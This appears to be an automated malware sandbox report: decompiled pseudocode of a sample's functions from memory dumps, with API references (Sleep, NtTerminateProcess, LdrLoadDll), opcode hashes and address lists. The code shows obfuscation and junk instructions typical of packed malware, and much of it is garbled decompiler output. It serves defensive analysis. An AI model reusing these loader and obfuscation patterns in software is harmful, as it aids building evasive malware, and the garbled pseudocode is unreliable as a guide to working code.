              				return L0040113B(_t13, _t17, _t19, _t21, _t22, _t26);
              			}

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 89745b0bfaaf1c7b55dfe8fa037d4d7c0223a41cfa17f4c26d190fbbe19b2ead
              • Instruction ID: 7d9be0058e33673f170ed7bdf9e45501506609fca6745517c781ff617e647718
              • Opcode Fuzzy Hash: 89745b0bfaaf1c7b55dfe8fa037d4d7c0223a41cfa17f4c26d190fbbe19b2ead
              • Instruction Fuzzy Hash: 9A014F77608205FBEB007AA59C41EBA362C9B04754F24C437BA03B80F1DA7C9712A76F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 65%
              			E00401830(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t20;
              				void* _t26;
              				intOrPtr* _t28;
              
              				_t31 = __eflags;
              				_t24 = __esi;
              				_t22 = __edi;
              				_t21 = __edx;
              				_push(__edx);
              				_push(0x184c);
              				_t8 =  *_t28;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t26 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t21, _t31, _t17,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t26 - 4); // executed
              				_t32 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t21, _t22, __esi, _t32, _t17, _t11,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t20 = 0x5c;
              				return L0040113B(_t13, _t17, _t20, _t22, _t24, _t32);
              			}

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: f0b3e7d236e0b2aebba72a48561d88988893c2cfd0a9863272573b7202c77ad1
              • Instruction ID: deb966eb77b9a567301be81d0aa6add722e5d663e7a56bf983217a5254dc7aad
              • Opcode Fuzzy Hash: f0b3e7d236e0b2aebba72a48561d88988893c2cfd0a9863272573b7202c77ad1
              • Instruction Fuzzy Hash: D9F0E677608205EBEB007A959C41EBA36289B04755F34C437BA13B90F1DA7D9712A72F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00401833(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* __ecx;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t21;
              				void* _t22;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t22, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t22, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t21 = 0x5c;
              				return L0040113B(_t13, _t17, _t21, _t23, _t25, _t31);
              			}

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 3be197aa96b37fb01e35ccc665f06a57c5b22eeab7c7f1fa4e7c4c0b74a31191
              • Instruction ID: 618970b1dbb32a4db62a2ca4bba0e2ab9b1e6011c78eec4eed3c6938ee6c48e5
              • Opcode Fuzzy Hash: 3be197aa96b37fb01e35ccc665f06a57c5b22eeab7c7f1fa4e7c4c0b74a31191
              • Instruction Fuzzy Hash: DFF01277604205FBEB047AE19C41EBA36289B04755F24C537BA13B80F1DA3C8712A72F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 63%
              			E00401836(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t20;
              				void* _t21;
              				void* _t23;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi - 1;
              				asm("invalid");
              				asm("int 0x8e");
              				L0040113B(_t8, __ebx, 0x5c, _t23, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t21, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t21, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t20 = 0x5c;
              				return L0040113B(_t13, _t17, _t20, _t23, _t25, _t31);
              			}

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 6270efecb34b7a24ecfb20c25f7994d7e548ab66cc763392a0d1480e5281e59a
              • Instruction ID: a9217997abf11aa28aa6879baaed046148431452325da12b2764b37c26675c88
              • Opcode Fuzzy Hash: 6270efecb34b7a24ecfb20c25f7994d7e548ab66cc763392a0d1480e5281e59a
              • Instruction Fuzzy Hash: 17F0FF77604205FBEB01AAA19C41A6A36289F05355F248477BA12B90F1DA389652A72B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00401842(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* __ecx;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t21;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(0xeb, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, 0xeb, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t21 = 0x5c;
              				return L0040113B(_t13, _t17, _t21, _t23, _t25, _t31);
              			}

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: b4b0a9984882ff5f2b6faabf12f6e8ec5eae452e92f205c2972abf1b7a202191
              • Instruction ID: 04e1208274e68be980b74980f77298c45205cb64358d3d7bc66da16523479b8c
              • Opcode Fuzzy Hash: b4b0a9984882ff5f2b6faabf12f6e8ec5eae452e92f205c2972abf1b7a202191
              • Instruction Fuzzy Hash: E5F03677604205FAEF007FE19C41EAA3728DF08759F248537BA12B80F1D5388612A72E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Executed Functions

              C-Code - Quality: 76%
              			E00402679(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
              				struct _OBJDIR_INFORMATION _v8;
              				char _v16;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				long _t12;
              				intOrPtr _t13;
              				struct _OBJDIR_INFORMATION _t15;
              				void* _t16;
              				void* _t20;
              				void* _t22;
              				UNICODE_STRING* _t23;
              				intOrPtr* _t24;
              
              				asm("cmc");
              				L0040113B(0x26ab, _t16, 0x54, _t20, _t22, __eflags);
              				_t17 = _a4;
              				_t23 =  &_v16;
              				 *((intOrPtr*)(_a4 + 0xc))(_t23, _a8);
              				_t21 =  &_v8;
              				_t12 = LdrLoadDll(0, 0, _t23,  &_v8);
              				_t27 = _t12;
              				if(_t12 != 0) {
              					_v8 = 0;
              				}
              				_push(0x26ab);
              				_t13 =  *_t24;
              				L0040113B(_t13, _t17, 0x54, _t21, _t23, _t27);
              				_t15 = _v8;
              				asm("cld");
              				return _t15;
              			}

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004026C1
              Memory Dump Source
              • Source File: 00000006.00000001.820130160.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 90caf3a2791a19ed9d756e485383a78dd0304a068a2d0dde794b5c3212d9556e
              • Instruction ID: 9392b1017120e72836d2f08bfb07165e30ffb9dd7dda72a47689019b9fa0b3fd
              • Opcode Fuzzy Hash: 90caf3a2791a19ed9d756e485383a78dd0304a068a2d0dde794b5c3212d9556e
              • Instruction Fuzzy Hash: 94018631608104E7DB00AA85CF4DBAE7728AB44308F204837A6077A1C0D5FF591BBB6F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E004026A1(void* __eax, void* __ebx, void* __edi, void* __esi) {
              				long _t13;
              				intOrPtr _t14;
              				struct _OBJDIR_INFORMATION _t16;
              				UNICODE_STRING* _t26;
              				void* _t28;
              				intOrPtr* _t30;
              
              				_t10 = __eax + 1;
              				_t33 = __eax + 1;
              				if (__eax + 1 >= 0) goto 0x40268f;
              				asm("cmc");
              				L0040113B(_t10, __ebx, 0x54, __edi, __esi, _t33);
              				_t18 =  *((intOrPtr*)(_t28 + 8));
              				_t26 = _t28 - 0xc;
              				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)));
              				_t23 = _t28 - 4;
              				_t13 = LdrLoadDll(0, 0, _t26, _t28 - 4);
              				_t34 = _t13;
              				if(_t13 != 0) {
              					 *(_t28 - 4) = 0;
              				}
              				_push(0x26ab);
              				_t14 =  *_t30;
              				L0040113B(_t14, _t18, 0x54, _t23, _t26, _t34);
              				_t16 =  *(_t28 - 4);
              				asm("cld");
              				return _t16;
              			}

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004026C1
              Memory Dump Source
              • Source File: 00000006.00000001.820130160.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 80697416e32412e61e90a2d0059fcaa52d4ad9df000577b6c23a564778a77204
              • Instruction ID: 039b92b3bc377875b2539483f21a67e2c46150ce5e09c5a02f6ccc11c3569293
              • Opcode Fuzzy Hash: 80697416e32412e61e90a2d0059fcaa52d4ad9df000577b6c23a564778a77204
              • Instruction Fuzzy Hash: 00F0A431604105E7CF409A80CA49BAE7760BF5431CF208837E607BA1C0C6BE960BAB5F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E00402684(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				long _t12;
              				intOrPtr _t13;
              				struct _OBJDIR_INFORMATION _t15;
              				UNICODE_STRING* _t25;
              				void* _t27;
              				intOrPtr* _t29;
              
              				asm("enter 0x26d5, 0x2f");
              				asm("cmc");
              				L0040113B(0x26ab, __ebx, 0x54, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				_t25 = _t27 - 0xc;
              				 *((intOrPtr*)( *((intOrPtr*)(_t27 + 8)) + 0xc))(_t25,  *((intOrPtr*)(_t27 + 0xc)));
              				_t22 = _t27 - 4;
              				_t12 = LdrLoadDll(0, 0, _t25, _t27 - 4);
              				_t33 = _t12;
              				if(_t12 != 0) {
              					 *(_t27 - 4) = 0;
              				}
              				_push(0x26ab);
              				_t13 =  *_t29;
              				L0040113B(_t13, _t17, 0x54, _t22, _t25, _t33);
              				_t15 =  *(_t27 - 4);
              				asm("cld");
              				return _t15;
              			}

              0x00402684
              0x004026a4
              0x004026a6
              0x004026ab
              0x004026ae
              0x004026b5
              0x004026b8
              0x004026c1
              0x004026c4
              0x004026c6
              0x004026c8
              0x004026c8
              0x004026d6
              0x004026db
              0x004026fa
              0x004026ff
              0x00402701
              0x00402706

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004026C1
              Memory Dump Source
              • Source File: 00000006.00000001.820130160.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 9fa225b73b0fbc440d7809f0c4de80ba1de754a46804c248283ef205c12e470c
              • Instruction ID: 1592832bb26429d0d5bc6eeac685ea7d810a8ce97a22e23b845bb34f93bf1d25
              • Opcode Fuzzy Hash: 9fa225b73b0fbc440d7809f0c4de80ba1de754a46804c248283ef205c12e470c
              • Instruction Fuzzy Hash: E7F04F31608504E7DF409A84CB4CBAD7764AB44318F208877E6077E1C0C6BF9A5BBB6B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E00402690(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				long _t13;
              				intOrPtr _t14;
              				struct _OBJDIR_INFORMATION _t16;
              				UNICODE_STRING* _t26;
              				void* _t28;
              				intOrPtr* _t30;
              
              				asm("cmc");
              				L0040113B(0x26ab, __ebx, 0x54, __edi, __esi, __eflags);
              				_t18 =  *((intOrPtr*)(_t28 + 8));
              				_t26 = _t28 - 0xc;
              				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)));
              				_t23 = _t28 - 4;
              				_t13 = LdrLoadDll(0, 0, _t26, _t28 - 4);
              				_t34 = _t13;
              				if(_t13 != 0) {
              					 *(_t28 - 4) = 0;
              				}
              				_push(0x26ab);
              				_t14 =  *_t30;
              				L0040113B(_t14, _t18, 0x54, _t23, _t26, _t34);
              				_t16 =  *(_t28 - 4);
              				asm("cld");
              				return _t16;
              			}

              0x004026a4
              0x004026a6
              0x004026ab
              0x004026ae
              0x004026b5
              0x004026b8
              0x004026c1
              0x004026c4
              0x004026c6
              0x004026c8
              0x004026c8
              0x004026d6
              0x004026db
              0x004026fa
              0x004026ff
              0x00402701
              0x00402706

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004026C1
              Memory Dump Source
              • Source File: 00000006.00000001.820130160.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 0b5097bee0adcdede92c20a6399b8213410aaf37ddf8ecf3ab260af07fe51a56
              • Instruction ID: c51ef2b5fccd3abaa8a4dbdb4b3eebed7944f530d1d10122075f7db3f908702c
              • Opcode Fuzzy Hash: 0b5097bee0adcdede92c20a6399b8213410aaf37ddf8ecf3ab260af07fe51a56
              • Instruction Fuzzy Hash: D3F06231608104E7DF409A95CA48B9E7720AB44319F248437E307BE1C0C6BB9A0BAB6B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 44%
              			E0040294E(void* __eax, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __fp0) {
              				signed char _t45;
              				signed char _t46;
              				void* _t48;
              				signed char _t51;
              				signed char _t52;
              				signed char _t53;
              				void* _t56;
              				intOrPtr _t59;
              				signed char _t64;
              				void* _t75;
              				signed char _t76;
              				void* _t87;
              				void* _t89;
              				void* _t90;
              				signed int _t96;
              				void* _t99;
              				signed int _t101;
              				void* _t102;
              				void* _t105;
              				void* _t114;
              				void* _t117;
              				void* _t122;
              				intOrPtr* _t125;
              				signed char _t147;
              				void* _t151;
              
              				_t151 = __fp0;
              				_t99 = __esi;
              				_t96 = __edi;
              				_t94 = __edx;
              				_t45 = __eax - 0x14ffec00;
              				_t147 = _t45;
              				_t114 = _t105 - 0xfffffffffffffff9;
              				if(_t147 > 0) {
              					asm("cmpsd");
              					 *0xad5ea7ab = _t45;
              					goto L6;
              				} else {
              					if(_t147 <= 0) {
              						L6:
              						asm("stosd");
              						asm("cmpsd");
              						_pop(_t99);
              						asm("lodsd");
              						asm("lodsd");
              						_t46 = _t45 -  *((intOrPtr*)(_t99 + _t101 * 8));
              						__eflags = _t46;
              						_t117 = _t114 - 0xffffffffffffffff;
              						 *((intOrPtr*)(_t46 + 0x68)) = 0xa74888cf;
              						goto L7;
              					} else {
              						asm("aas");
              						_t117 = _t114 - 0xffffffffffffffff;
              						_t46 = _t45 & 0x0000004c;
              						 *((intOrPtr*)(_t46 + 0x4c)) =  *((intOrPtr*)(_t46 + 0x4c)) - __ecx;
              						_t3 = __edi + 0x4c + __edi * 2;
              						 *_t3 =  *(__edi + 0x4c + __edi * 2) & __ecx;
              						if( *_t3 <= 0) {
              							L7:
              							asm("cmpsd");
              							asm("adc edi, esp");
              							asm("cmpsd");
              							 *0xab21a462 = _t46 - 1;
              							_t48 = 0x29fb;
              							_t87 = 0xa4;
              							L0040113B(_t48, 0xb3, _t87, _t96, _t99, __eflags);
              							asm("ror edi, 0x89");
              							asm("bound ecx, [esp+ecx*2+0x1c]");
              							 *0x00000091 = es;
              							 *((intOrPtr*)(_t101 + 0x4c)) =  *((intOrPtr*)(_t101 + 0x4c)) - _t87;
              							asm("ror edi, 0xbd");
              							asm("bound ecx, [esp+ecx*2+0x1c]");
              							 *((intOrPtr*)(0x91)) = es;
              							 *((intOrPtr*)(_t101 + 0x4c)) =  *((intOrPtr*)(_t101 + 0x4c)) + _t87;
              							_t51 = 0xa4;
              							_pop(_t75);
              							_t76 = _t75 + 1;
              							__eflags = _t76;
              							_pop(_t102);
              							if(_t76 < 0) {
              								asm("ror edi, 0x45");
              								asm("arpl [esp+ecx*2+0x1c], cx");
              								 *((intOrPtr*)(0x91)) = es;
              								asm("ror edi, 0x59");
              								asm("arpl [esp+ecx*2+0x1c], cx");
              								 *((intOrPtr*)(0x91)) = es;
              								_t102 = _t102 - 1;
              								asm("cmpsd");
              								_t64 = 0x4d;
              								 *0x0000012F =  *0x0000012F & 0x000000a4;
              								asm("retf 0x24cd");
              								_t76 = 0x65;
              								asm("invalid");
              								_t51 = _t64;
              								_t94 = 0xa77ba3a7;
              								_t87 = 0xa74888cf;
              								__eflags = 0xa4 - 0xc4;
              							}
              							asm("loopne 0x42");
              							asm("insd");
              							_pop(_t122);
              							_t52 = _t51 & 0x000000e8;
              							_t125 = _t122 - 0xffffffffffffffff;
              							 *((intOrPtr*)(_t52 + 0x68)) = 0xa74888cf;
              							_t88 = _t87 - 1;
              							__eflags = _t87 - 1;
              							if(__eflags <= 0) {
              								asm("cmpsd");
              								 *0xaad0a488 = _t52;
              								_t76 = 0xb3;
              								_push(0x2ace);
              								_t59 =  *_t125;
              								_t88 = 0xa8;
              								L0040113B(_t59, 0xb3, _t88, 0x8cc9b3b3, _t99, __eflags);
              								_push( *((intOrPtr*)(_t102 - 4)));
              								L004018AF(_t94, _t99, __eflags);
              								_t32 = _t76 + 0x2f1d; // 0x2fd0
              								_t52 = _t32;
              							}
              							asm("das");
              							 *_t52 =  *_t52 + _t52;
              							_push(_t52);
              							_push( *((intOrPtr*)(_t102 - 4)));
              							_t53 = L004024AC(_t76, 0x8cc9b3b3, _t99, __eflags); // executed
              							__eflags = _t53;
              							if(__eflags != 0) {
              								__eflags = L00401E02(_t94, 0x8cc9b3b3, __eflags, _t151,  *((intOrPtr*)(_t102 - 4)));
              								if(__eflags != 0) {
              									L29:
              									__eflags = gs;
              									if(__eflags != 0) {
              										_t56 = _t76 + 0x51f2;
              										_t89 = 0x2dfd;
              									} else {
              										_t38 = _t76 + 0x2f5d; // 0x3010
              										_t56 = _t38;
              										_t89 = 0x2295;
              									}
              									_push( *((intOrPtr*)(_t76 + 0x7fef)));
              									_push(_t89);
              									_push(_t56);
              									_push( *((intOrPtr*)(_t102 - 4)));
              									L00401813(_t94, _t99, __eflags);
              									asm("cmc");
              									__eflags = 0;
              									 *0x2ace =  *0x2ace + 0x2ace;
              									_t90 = 0xa8;
              									_t53 = L0040113B(0x2ace, _t76, _t90, 0x8cc9b3b3, _t99, 0);
              								} else {
              									_t53 = L00402114(_t94, __eflags,  *((intOrPtr*)(_t102 - 4)));
              									__eflags = _t53;
              									if(__eflags != 0) {
              										_push( *((intOrPtr*)(_t102 - 4)));
              										_t53 = L004021E4(_t94, __eflags, _t151);
              										__eflags = _t53;
              										if(__eflags != 0) {
              											_push( *((intOrPtr*)(_t102 - 4)));
              											_t53 = L00401EB1(_t88, __eflags);
              											__eflags = _t53;
              											if(_t53 != 0) {
              												goto L29;
              											}
              										}
              									}
              								}
              							}
              							return _t53;
              						} else {
              							asm("adc al, cl");
              							 *(_t46 + 0x384c72cc) =  *(_t46 + 0x384c72cc) ^ _t117 - 0xfffffffffffffffd;
              							asm("sbb dh, [ebx-0x5e5b4fc7]");
              							 *((intOrPtr*)(0x91)) = es;
              							asm("scasb");
              							asm("out 0xcf, eax");
              							asm("invalid");
              							_push(0xa74888cf);
              							_push(0x1f);
              							return 0x1f;
              						}
              					}
              				}
              			}

              0x0040294e
              0x0040294e
              0x0040294e
              0x0040294e
              0x0040295b
              0x0040295b
              0x00402960
              0x00402961
              0x004029af
              0x004029b0
              0x00000000
              0x00402963
              0x00402963
              0x004029b1
              0x004029b1
              0x004029b2
              0x004029b3
              0x004029b4
              0x004029b5
              0x004029b6
              0x004029b6
              0x004029bb
              0x004029bc
              0x00000000
              0x00402965
              0x00402967
              0x00402968
              0x00402969
              0x0040296b
              0x0040296f
              0x0040296f
              0x00402973
              0x004029c1
              0x004029c2
              0x004029c4
              0x004029c6
              0x004029c7
              0x004029db
              0x004029ee
              0x004029f6
              0x004029fb
              0x004029fe
              0x00402a0b
              0x00402a0e
              0x00402a12
              0x00402a15
              0x00402a22
              0x00402a25
              0x00402a2b
              0x00402a2d
              0x00402a33
              0x00402a33
              0x00402a34
              0x00402a35
              0x00402a39
              0x00402a3c
              0x00402a49
              0x00402a50
              0x00402a53
              0x00402a60
              0x00402a64
              0x00402a67
              0x00402a68
              0x00402a69
              0x00402a6c
              0x00402a6f
              0x00402a73
              0x00402a7b
              0x00402a7c
              0x00402a81
              0x00402a82
              0x00402a82
              0x00402a84
              0x00402a86
              0x00402a87
              0x00402a88
              0x00402a8c
              0x00402a8d
              0x00402a94
              0x00402a94
              0x00402a95
              0x00402a97
              0x00402a98
              0x00402a9d
              0x00402aa5
              0x00402aaa
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b65
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b19
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77
              0x00402975
              0x0040297a
              0x0040297c
              0x00402983
              0x0040298d
              0x00402990
              0x00402994
              0x004029a5
              0x004029a7
              0x004029ad
              0x004029ae
              0x004029ae
              0x00402973
              0x00402963

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2b839fabab3310f66fafc047d9c24446b3a87488924e78c1b0467cffa7a0a9ec
              • Instruction ID: d476424f13aa43859d7491ddcaddda13511bdd08c1c7de62bee6dbd18e85cba0
              • Opcode Fuzzy Hash: 2b839fabab3310f66fafc047d9c24446b3a87488924e78c1b0467cffa7a0a9ec
              • Instruction Fuzzy Hash: FE516A31615900DED710AF61AF4B5A97770FF60300F6400BBD446BB2E6D6B89942DF9B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E00402A74(signed char __eax, void* __ecx, void* __edi, void* __esi, void* __fp0) {
              				signed char _t16;
              				signed char _t17;
              				void* _t18;
              				void* _t19;
              				void* _t21;
              				intOrPtr _t24;
              				void* _t30;
              				void* _t32;
              				void* _t33;
              				void* _t37;
              				void* _t39;
              				intOrPtr* _t42;
              				void* _t54;
              
              				_t54 = __fp0;
              				_t36 = __esi;
              				_t35 = __edi;
              				_t16 = __eax;
              				_t30 = 0xa74888cf;
              				asm("loopne 0x42");
              				asm("insd");
              				_pop(_t39);
              				_t17 = _t16 & 0x000000e8;
              				_t42 = _t39 - 0xffffffffffffffff;
              				 *((intOrPtr*)(_t17 + 0x68)) = 0xa74888cf;
              				_t31 = _t30 - 1;
              				_t46 = _t30 - 1;
              				if(_t30 - 1 <= 0) {
              					asm("cmpsd");
              					 *0xaad0a488 = _t17;
              					_push(0x2ace);
              					_t24 =  *_t42;
              					_t31 = 0xa8;
              					L0040113B(_t24, 0xb3, _t31, __edi, __esi, _t46);
              					_push( *((intOrPtr*)(_t37 - 4)));
              					L004018AF(0xa77ba3a7, __esi, _t46);
              					_t17 = 0x2fd0;
              				}
              				asm("das");
              				 *_t17 =  *_t17 + _t17;
              				_push(_t17);
              				_push( *((intOrPtr*)(_t37 - 4)));
              				_t18 = L004024AC(0xb3, _t35, _t36, _t46); // executed
              				_t47 = _t18;
              				if(_t18 != 0) {
              					_t19 = L00401E02(0xa77ba3a7, _t35, _t47, _t54,  *((intOrPtr*)(_t37 - 4)));
              					_t48 = _t19;
              					if(_t19 != 0) {
              						L14:
              						_t52 = gs;
              						if(gs != 0) {
              							_t21 = 0x52a5;
              							_t32 = 0x2dfd;
              						} else {
              							_t21 = 0x3010;
              							_t32 = 0x2295;
              						}
              						_push( *0x000080A2);
              						_push(_t32);
              						_push(_t21);
              						_push( *((intOrPtr*)(_t37 - 4)));
              						L00401813(0xa77ba3a7, _t36, _t52);
              						asm("cmc");
              						 *0x2ace =  *0x2ace + 0x2ace;
              						_t33 = 0xa8;
              						_t18 = L0040113B(0x2ace, 0xb3, _t33, _t35, _t36, 0);
              					} else {
              						_t18 = L00402114(0xa77ba3a7, _t48,  *((intOrPtr*)(_t37 - 4)));
              						_t49 = _t18;
              						if(_t18 != 0) {
              							_push( *((intOrPtr*)(_t37 - 4)));
              							_t18 = L004021E4(0xa77ba3a7, _t49, _t54);
              							_t50 = _t18;
              							if(_t18 != 0) {
              								_push( *((intOrPtr*)(_t37 - 4)));
              								_t18 = L00401EB1(_t31, _t50);
              								if(_t18 != 0) {
              									goto L14;
              								}
              							}
              						}
              					}
              				}
              				return _t18;
              			}

              0x00402a74
              0x00402a74
              0x00402a74
              0x00402a7b
              0x00402a81
              0x00402a84
              0x00402a86
              0x00402a87
              0x00402a88
              0x00402a8c
              0x00402a8d
              0x00402a94
              0x00402a94
              0x00402a95
              0x00402a97
              0x00402a98
              0x00402aa5
              0x00402aaa
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af0
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
